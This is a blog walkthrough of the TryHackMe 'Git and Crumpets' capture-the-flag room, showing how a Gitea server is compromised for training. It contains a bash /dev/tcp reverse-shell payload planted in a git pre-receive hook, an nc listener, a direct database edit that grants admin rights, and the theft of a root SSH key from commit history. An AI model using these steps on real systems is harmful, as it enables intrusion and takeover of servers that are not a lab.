TryHackMe Gitandcrumpets
@ Animesh Roy | Sunday, Jul 4, 2021 | 3 minutes read | Update at Sunday, Jul 4, 2021

Git and Crumpets

Our devs have been clamoring for some centralized version control, so the admin came through. Rumour has it that they included a few countermeasures…

Task 01: Start the VM

Task 02: Git the flags


  • I tried running nmap, no luck

  • being impatatient, I ran a quick curl commnad curl -s 10.10.x.y to see what’s up.


    got this output.

  • let’s setup DNS record, edit /etc/hosts file.

    cat /etc/hosts
    10.10.x.y   git.git-and-crumpets.thm
    # it should do the work.
  • register a new account

  • git clone the repo

    git clone http://git.git-and-crumpets.thm/scones/cant-touch-this.git
    # use the creds to authenticate yourself
  • cd to the repo-dir run git log, it reavels that password is somewhere in “Avatar” a quick strings commmand reaveals the password. let’s use the creds to login in to scones account.


    let’s try loggin in with the email [email protected] and the password Password.

    Create a git hook (http://git.git-and-crumpets.thm/scones/cant-touch-this/settings/hooks/git). You can edit the pre-receive to following code, or create your own listener here

    • Payload
    bash -i >& /dev/tcp/YOUR_IP/9001 0>&1 #change IP
    • Start nc listener on our machine

      nc -lvnp 9001
  • Now change the readme file (http://git.git-and-crumpets.thm/scones/cant-touch-this/_edit/master/ and click save. You should get a reverse shell:

    nc -lvnp 9001                                                            127listening on [any] 9001 ...
    connect to [] from (UNKNOWN) [] 58472
    bash: cannot set terminal process group (886): Inappropriate ioctl for device
    bash: no job control in this shell
    [git@git-and-crumpets cant-touch-this.git]$ cat /home/git/user.txt #returns base64 encoded flag. decode it 

    Decode the flag

    echo -n "EncodedText==" | base64 -d 


  • Look at the gitea database, update the current user you have to admin:

    [git@git-and-crumpets tmp]$ sqlite3 /var/lib/gitea/data/gitea.db
    update user set is_admin=1 where id=3;
    #if you didn't upgrade your shell, it might show blank line. don't worry about it
  • Now you can see all repos on the scones account (http://git.git-and-crumpets.thm/admin/repos).

  • Go to the backup repo, to the second branch, look at the commits (http://git.git-and-crumpets.thm/root/backup/commits/branch/dotfiles).

  • There you will find the openssh key (http://git.git-and-crumpets.thm/root/backup/commit/0b23539d97978fc83b763ef8a4b3882d16e71d32):


  • Copy the COntent of SSH key

  • Copy this key and put it in the file root.key (dont forget chmod):

    vi root.key #paste the key
    chmod 400 root.key #My file name is root.key
  • now login & get the root flag

    ssh -i root.key [email protected]
    The authenticity of host ' (' can't be established.
    ECDSA key fingerprint is SHA256:Tm4zUvVK5KsvOsFB2xvRHK4yg58piyOwURqB1Zr2tXI.
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '' (ECDSA) to the list of known hosts.
    Enter passphrase for key 'root.key': #SSH_FILE_NAME {Sup3rS3cur3: is the password}
    [root@git-and-crumpets ~]# cat root.txt 
  • Decode the flag

    echo -n "EncodedText==" | base64 -d 

© 2010 - 2024 Classroom

Reading Stuffs

Social Links